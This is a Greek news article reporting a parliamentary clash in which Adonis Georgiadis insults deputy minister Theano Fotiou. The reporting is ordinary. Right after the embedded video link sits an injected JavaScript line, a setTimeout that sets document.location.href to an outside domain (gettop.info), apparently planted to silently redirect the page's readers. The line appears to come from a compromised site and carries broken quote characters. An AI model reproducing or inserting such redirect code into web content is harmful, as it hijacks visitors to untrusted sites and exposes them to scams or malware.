Έξαλλος ο Άδωνις με την Φωτίου: Εδώ δεν φτιάχνουμε γεμιστά και μαρμελάδες (ΒΙΝΤΕΟ)

0
41

Επίθεση στην αναπληρώτρια υπουργό Εργασίας Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης Θεανώ Φωτίου εξαπέλυσε από το βήμα της Βουλής ο αντιπρόεδρος της Νέας Δημοκρατίας, Άδωνις Γεωργιάδης.
Αρχικά ο κ.Γεωργιάδης αναφέρθηκε στις χθεσινές δηλώσεις του πρωθυπουργού για τον Πάνο Καμμένο αλλά και στη σημερινή δήλωσή του κ. Ζουράρι:

«Την ίδια ώρα που λέει «μπούλη» τον Καμμένο, και ο ίδιος φαίνεται να το απολαμβάνει, ακούμε τον υφυπουργό παιδείας τον κ.Ζουράρι να λέει δεν πειράζει να δώσουμε και 2-3 νησιά στους Τούρκους, ενώ η κα Φωτίου βγήκε στον ΣΚΑΪ πριν από δύο εβδομάδες και έλεγε ότι έκλεισε η β’ αξιολόγηση και η β’ αξιολόγηση όπως όλα δείχνουν πάει για το Μάρτιο»

Έχετε καταλάβει ότι είστε κυβέρνηση; τι δηλώσεις είναι αυτές που κάνετε;» ρώτησε από το βήμα ο κ. Γεωργιάδης τους υπουργούς και τους βουλευτές του ΣΥΡΙΖΑ. Η Θεανώ Φωτίου επιχείρησε να αντιδράσει.

«Προστατέψτε με από την κα Φωτιου κ πρόεδρε, δεν κάνουμε γεμιστά ούτε μαρμελάδες εδώ» είπε ο κ. Γεωργιάδης απευθυνόμενος στον προεδρεύοντα της Βουλής με την κα Φωτίου να του απαντά ότι είναι αστείος και αυτός να ανταπαντά: «Πιο αστείο πράγμα από το να είστε υπουργός εσείς δεν έχει υπάρξει».

«Να προσέχετε τα λόγια σας» φωνάξε από το έδρανο της η κα Φωτίου και ο Άδωνις Γεωργιάδης απάντησε σε υψηλούς τόνους «δεν θέλω να σας προσέχω καθόλου, να φύγετε κυρία μου, να φύγετε δεν θέλω να σας βλέπω».

https://youtu.be/_TqpOjRHG8c setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here